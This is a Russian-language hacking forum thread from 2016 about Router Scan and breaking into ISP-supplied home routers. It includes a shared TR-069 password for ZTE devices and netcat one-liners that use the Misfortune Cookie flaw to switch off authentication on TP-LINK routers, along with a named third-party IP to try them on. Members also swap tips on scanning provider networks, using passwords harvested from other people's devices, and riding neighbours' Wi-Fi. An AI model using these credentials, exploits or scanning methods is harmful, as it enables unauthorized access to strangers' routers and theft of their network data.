для меня TR-069 совсем темный лес. но ведь зачем-то там mini_httpd/1.19 19 стоит. как я для себя понял систему работы - у провайдера стоит сервис, который ходит авторизовавшись по прямым ссылкам и смотрит/правит настройки. или нет?
этих ZTE у дом.ру кучи, такая же фигня в МТС. а получается, толку нет
по TR-069 вроде провайдер прошивку меняет на терминалах
chugunkin
14.03.2016, 02:11
TR-069 действительно основан на HTTP.
Проверял на Sagemcom FaST известного(старейшего) из провайдеров. Он с..а закрыл все внешние порты кроме 7547(TR-069).
Ради интереса можете просканировать RS любой из IP ...телекома на 80 и 7547 и почувствуйте разницу. По моим скромным оценкам разница в пол сотни раз. А вот как можно это использовать ... Лично у меня ничего не получилось, хотя таки да протокол создан для управления всеми настроенными роутерами с одного сервера. Всем Удачи.
Felis-Sapiens
14.03.2016, 13:33
и всё же, как бы изломать домрушные ZTE ZXHN H118N, у которых снаружи открыт только порт tr069?
ко всем подходит пароль cracs:Snyk9Tl24v75fHr9Jn9V а вот дальше то чего с ними сделать?
То есть TR-069 основан на HTTP? Не знал. Или так только с этими роутерами?
Там должны быть свои API вызовы, в том числе позволяющие открыть порт или включить удалённое администрирование.
А вот как можно это использовать ... Лично у меня ничего не получилось, хотя таки да протокол создан для управления всеми настроенными роутерами с одного сервера.
Можете почитать вот этот документ: https://www.broadband-forum.org/technical/download/TR-069_Amendment-5.pdf
Если я правильно понял, инициатором соединения может быть как CPE (Customer Premise Equipment, в нашем случае это роутер), так и ACS (Auto-Configuration Server). Первый должен делать это, например, при включении/перезагрузке, через определённый интервал (ManagementServer.PeriodicInformInterval), при изменении ACS URL, ..., либо при получении валидного запроса от ACS. ACS для установления соединения должен использовать пустой HTTP GET запрос, в качестве метода аутентификации - HTTP digest authentication. При успешной аутентификации CPE отвечает “200 (OK)” или “204 (No Content)”, после чего он должен в течение 30 секунд попытаться открыть сессию с предопределенным адресом ACS. Подчёркиваю, CPE устанавливает сессию не с тем адресом, с которого пришёл запрос, а с тем, который: 1) задан по умолчанию; 2) был сконфигурирован локально; 3) получен от DHCP сервера (который может включать ACS URL как опцию).
Вывод: использовать tr069 со стороны, даже зная пароль, не получиться (если не брать в расчёт возможное наличие уязвимостей).
P.S. TR-069 использует следующий стек протоколов:
CPE/ACS Management Application
RPC Methods
SOAP
HTTP
SSL/TLS
TCP/IP
P.P.S А домрушных ZTE ZXHN H118N (если речь о подключении к wifi) есть словарик.
Felis-Sapiens
14.03.2016, 15:33
#exploit
Уязвимость Misfortune Cookie применительно к TP-LINK TD-W8901N
Изучая информацию по TR-069, опять наткнулся на упоминания уязвимости CVE-2014-9222 Misfortune Cookie во встраиваемом веб-сервере RomPager, а конкретно, вот на эту презентацию: http://www.rsaconference.com/writab...things-one-exploit-to-rule-them-all_final.pdf. Там есть некоторые технические подробности данной уязвимости и ссылка (http://cawanblog.blogspot.ru/2015/02/misfortune-cookie-cve-2014-9222.html) на пример её реализации для TD-W8901N.
Чтобы получить доступ к настройкам данной модели роутера без необходимости ввода пароля, нужно отправить запрос с "Cookie: C107353880=\0", что равносильно выполнению команды "sys pswauthen 0". С curl этого сделать не получиться, но можно отправить пакет, например, с помощью netcat:
echo $'GET / HTTP/1.1\nCookie: C107353880=\x00' | nc
От себя добавлю, что вернуть аутентификацию, можно аналогичным образом:
echo $'GET / HTTP/1.1\nCookie: C107353880=\x01' | nc
Кто хочет поразвлекаться, вот ip, на котором это работает: 46.244.71.I58
denlenin
14.03.2016, 19:16
P.P.S А домрушных ZTE ZXHN H118N (если речь о подключении к wifi) есть словарик.
у меня по этому словарю 50/50 - 2 из 4х точек сдались. две либо с меняными паролями, либо словарь не полный. надо будет заняться и проверить их еще раз.
в локалке другого провайдера около тысячи ZTE H218N, бери - не хочу, только RS инфу из них не выдирает
а внутренние адреса пощупать московской oнлиm- ни кто не в курсе? )
binarymaster
15.03.2016, 21:08
а внутренние адреса пощупать московской oнлиm- ни кто не в курсе? )
Их можно пощупать только находясь внутри неё.
Точек входа извне пока не обнаружил.
Felis-Sapiens
15.03.2016, 21:56
так я внутри )
Ну, тогда начинай с 10.224.0.0 (если речь про onlimе)
У меня есть возможность войти в onlime вовнутрь могу потестить, правда связь дохленькая, сейчас сканю диапазон MGTS те у которых белые IP есть, интересная особенность, в основном там три модели ZTE F660, hardware: 2.3, firmware: 2.3.1P1T7S пробиваются на 443 порту сдают всю инфу, Sercomm Atron RFT620 тоже самое,а вот какие то HuaweiHomeGateway не сдаются, порты в основном 58000 7457,соотношение примерно 1% гудов, но вот один интересный экземпляр попался из ZTE на порту 58000, пароль и логин сдал admin:1234 а дальше глухо, по этому порту в браузере вот такая строка " This XML file does not appear to have any style information associated with it. The document tree is shown below." Досканю может выложу, но блин у меня вопрос почему меня на http://3wifi.stascorp.com/map по гостевому antichat аккаунту не логинит?Да и сайт тормозит просто жутко.
Благодарю выше за подсказку.
Конечно же весь онлим практически уже был на сайте Но! Сумел найти 170 уникальных точек и залил вчера
У меня новый вопрос - вот допустим сижу я в другой сетке. Хочу ее пощупать и внести свою лепту (опять же залить на сайт).
Как узнать внутренние адреса сетки?
10.х.х.х или 100.х.х.х как экспресс просканировать? Перепрыгивая через последнюю цифру - проффи поделитесь опытом.
CRACK211
16.03.2016, 13:04
Благодарю выше за подсказку.
Конечно же весь онлим практически уже был на сайте Но! Сумел найти 170 уникальных точек и залил вчера
У меня новый вопрос - вот допустим сижу я в другой сетке. Хочу ее пощупать и внести свою лепту (опять же залить на сайт).
Как узнать внутренние адреса сетки?
10.х.х.х или 100.х.х.х как экспресс просканировать? Перепрыгивая через последнюю цифру - проффи поделитесь опытом.
Запускаете Router Scan v2.53>main menu>user manual>Введение>использование вспомогательных утилит
3.1. Использование ping
3.2. Использование tracert
3.3. Использование nslookup
(посыпая голову пеплом)
Пошел читать инструкцию
Спасибо
binarymaster
18.03.2016, 19:19
Не знаю, в какую тему правильнее запостить, так что напишу сюда.
Благодаря удачному восстановлению одного из древних бекапов, удалось реанимировать некоторые веб приложения на сайте (блок справа). В частности, Вафле-Скан снова работает, который для определения точек на карте. Также он был модернизирован путём добавления дополнительных источников данных.
CRACK211
18.03.2016, 20:47
Не знаю, в какую тему правильнее запостить, так что напишу сюда.
Благодаря удачному восстановлению одного из древних бекапов, удалось реанимировать некоторые веб приложения на сайте (блок справа). В частности, Вафле-Скан снова работает, который для определения точек на карте. Также он был модернизирован путём добавления дополнительных источников данных.
Можно поподробнее?)
Нашёл спасибо)
chugunkin
23.03.2016, 09:58
binarymaster
Вопрос к разработчику...функция Use credentials
Нельзя ли добавить проверку роутеров D-Link-300NRU rev.B5/B6(v.2.5.4; v.2.5.11; v.2.5.12; v.2.5.19) и аналогичных D-Link'ов.
D-Link-300 (без NRU) проверяет...
Спасибо.
HaronSVD
27.03.2016, 03:54
Вопрос знатокам:
Предисловие: сижу по соседской вафле, значит прога сканит сеть через роутер. Имеется в наличии 2 разных роутера.
Внимание, вопрос: почему при скане через ASUS RT-N10P полет нормальный (спокойно могу приостановить скан и влезть в инет), а при скане через TP-LINK (модель сейчас не могу назвать), результат сканирования шикарный, но после остановки - роутер "умирает" до хардварного ребута?Даже в вебморду не зайти.
denlenin
27.03.2016, 06:51
Вопрос знатокам:
Предисловие: сижу по соседской вафле, значит прога сканит сеть через роутер. Имеется в наличии 2 разных роутера.
Внимание, вопрос: почему при скане через ASUS RT-N10P полет нормальный (спокойно могу приостановить скан и влезть в инет), а при скане через TP-LINK (модель сейчас не могу назвать), результат сканирования шикарный, но после остановки - роутер "умирает" до хардварного ребута?Даже в вебморду не зайти.
количество потоков поменьше поставь. не забывай, что железку кроме тебя еще и хозя нагружает, теми же торрентами, например.
ну и метод сканирования имеет значение
HaronSVD
27.03.2016, 12:54
количество потоков поменьше поставь. не забывай, что железку кроме тебя еще и хозя нагружает, теми же торрентами, например.
ну и метод сканирования имеет значение
Я этим занимаюсь ночью. Кроме меня к роутеру никто не подрублен. Как перезагрузят железку - попробую с измененными параметрами.
А имеется ссыль на русик для проги? Я узаю Portable версию 2.53 на буржуйском. Не очень удобно.
henri2002
27.03.2016, 19:41
А имеется ссыль на русик для проги?
нету его.
VladimirV
27.03.2016, 22:25
Вопрос знатокам:
Предисловие: сижу по соседской вафле, значит прога сканит сеть через роутер. Имеется в наличии 2 разных роутера.
Внимание, вопрос: почему при скане через ASUS RT-N10P полет нормальный (спокойно могу приостановить скан и влезть в инет), а при скане через TP-LINK (модель сейчас не могу назвать), результат сканирования шикарный, но после остановки - роутер "умирает" до хардварного ребута?Даже в вебморду не зайти.
Если роутер виснет от 200 - 300 потоков, пробуйте подключится через VPN.
Kevin Shindel
29.03.2016, 11:53
А есть возможность Импортировать в Router Scan сразу несколько листов результатов?
По-умолчанию можно выбрать только один лист за раз. А что делать если их 25-50-100 ? Добавлять по одному? Это же не удобно...
Я думаю не только у меня возникла такая необходимость..
Felis-Sapiens
29.03.2016, 12:26
А есть возможность Импортировать в Router Scan сразу несколько листов результатов?
По-умолчанию можно выбрать только один лист за раз. А что делать если их 25-50-100 ? Добавлять по одному? Это же не удобно...
Я думаю не только у меня возникла такая необходимость..
Нет, такой возможности пока нет, хотя уже просили. Если логи в txt формате, можно объединить их в один:
copy /B *.txt all.txt
Kevin Shindel
29.03.2016, 12:41
Ну хоть так, удобней конечно сразу мышкой выбрать необходимые.
dyvolakun
29.03.2016, 20:32
сканирую локальные адреса московского АКАДО версией 2.5.3.0-тест изнутри сети:
пропускаются многие IP - почти все, если указывать много потоков.
В результате перебора всех значений разных параметров оставил 1 поток - остальные изменения не помогали.
Прочел эту тему со 105 по 66 страницу - не нашел ничего похожего на мою проблему.
Пробовал версии 2.5.2.0 и 2.4.3.0 - то же самое.
Хотя полгода-год назад таких проблем у меня не было - ловилось очень много IP.
Посоветуйте что-нить, пжлста!
н-да-а-а...извиняюсь за маленький офтоп, но по-моему форум без нашего binarymaster потихоньку подмерзает. как бы до июля все не рассосались
кстати в помощь к роутерскану наткнулся на неплохой сайтик https://suip.biz/ru/? это не реклама. и не мой сайт. может кому сгодится.
Kevin Shindel
01.04.2016, 11:52
н-да-а-а...извиняюсь за маленький офтоп, но по-моему форум без нашего binarymaster потихоньку подмерзает. как бы до июля все не рассосались
кстати в помощь к роутерскану наткнулся на неплохой сайтик https://suip.biz/ru/? это не реклама. и не мой сайт. может кому сгодится.
Спасибо очень удобно, вбил город на латинице и сразу получил диапазоны.
denlenin
01.04.2016, 20:08
кстати в помощь к роутерскану наткнулся на неплохой сайтик https://suip.biz/ru/? это не реклама. и не мой сайт. может кому сгодится.
справедливости ради - база не полная
Evgen555
02.04.2016, 17:07
почему после изменения настроек в роутере после перезагрузки не могу зайти подскажите в чём проблемма
Richmounth
02.04.2016, 20:50
почему после изменения настроек в роутере после перезагрузки не могу зайти подскажите в чём проблемма
Смотря что ты там настраивал, чей роутер?
Evgen555
02.04.2016, 23:31
Смотря что ты там настраивал, чей роутер?
да все подряд хочу удалённо подключится некак неполучается вирт сервер невыходит ХЭЭЭЛЛПП
Evgen555
02.04.2016, 23:59
Читаем про проброс портов.
ок вопрос будет напишу. И за это спасибо
Evgen555
03.04.2016, 00:24
ок вопрос будет напишу. И за это спасибо
Читаем про проброс портов.
ага всё сделал по инструкции после перезапуска такая же херь или можно не перезапускать и так работать будет?
Evgen555
03.04.2016, 11:10
Так будет до поры, пока роутер не перезагрузится. Читаем про DHCP и Address Reservation.
Спасибо почитаю. И вопрос я смогу через роутер подключиться к одной сети чтобы работать программой интерцептер нг
Evgen555
03.04.2016, 11:57
Спасибо почитаю. И вопрос я смогу через роутер подключиться к одной сети чтобы работать программой интерцептер нг
вроде всё получилось перезагрузил всё норм настроил на 2233 порт какой прогой проверить можно
справедливости ради - база не полная
согласен. беза не полная. по сравнению с 2ip.com.ua рядом не стояла. еще сырой сайтик. но инструменты для анализа очень даже не плохие. главное то, что будут пополняться ( по утверждению автора сайта).
Захожу на 2ip и смотрю свой ip, к примеру 81.101.111.34, ростелеком. Ввожу в роутскан 81.101.111.0-81.101.111.255 Вопщем ловит и ломает, НО...Не могу поймать рядом находящиеся роутеры и даже свой, т е ловит всё что угодно, из каких то других регионов, может даже изза бугра, а мне надо чтобы он сканировал нужные мне рядом находящиеся роутеры. Как это сделать?
CRACK211
06.04.2016, 12:15
Захожу на 2ip и смотрю свой ip, к примеру 81.101.111.34, ростелеком. Ввожу в роутскан 81.101.111.0-81.101.111.255 Вопщем ловит и ломает, НО...Не могу поймать рядом находящиеся роутеры и даже свой, т е ловит всё что угодно, из каких то других регионов, может даже изза бугра, а мне надо чтобы он сканировал нужные мне рядом находящиеся роутеры. Как это сделать?
Запускаете Router Scan v2.53>main menu>user manual>Введение>использование вспомогательных утилит
3.1. Использование ping
3.2. Использование tracert
3.3. Использование nslookup
timon8484
06.04.2016, 18:03
Народ привет есть словари хорошие для проги Router Scan ????
Richmounth
06.04.2016, 20:18
Народ привет есть словари хорошие для проги Router Scan ????
например восьмизнак?
Это тебе не Hydra. Там в принципе есть все стандартные пароли, ну только что если дополнить десятком своих.
timon8484
06.04.2016, 20:28
например восьмизнак?
Это тебе не Hydra. Там в принципе есть все стандартные пароли, ну только что если дополнить десятком своих.
НУ ХЗ какие бывают может у кого есть сборки паролей свои =)
timon8484
06.04.2016, 20:29
стандартные пароли это понятно они есть
Richmounth
06.04.2016, 20:38
Захожу на 2ip и смотрю свой ip, к примеру 81.101.111.34, ростелеком. Ввожу в роутскан 81.101.111.0-81.101.111.255 Вопщем ловит и ломает, НО...Не могу поймать рядом находящиеся роутеры и даже свой, т е ловит всё что угодно, из каких то других регионов, может даже изза бугра, а мне надо чтобы он сканировал нужные мне рядом находящиеся роутеры. Как это сделать?
На ростелекоме не пытайся найти соседа, ip разбросаны как попало, к примеру 81.101.111.34- один город , 81.101.111.35-другой - в твоем регионе - на следующий день все может поменяться, А ты уверен что у тебя ростелеком ??? VIRGIN-MEDIA-UK-IP-BLOCK
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot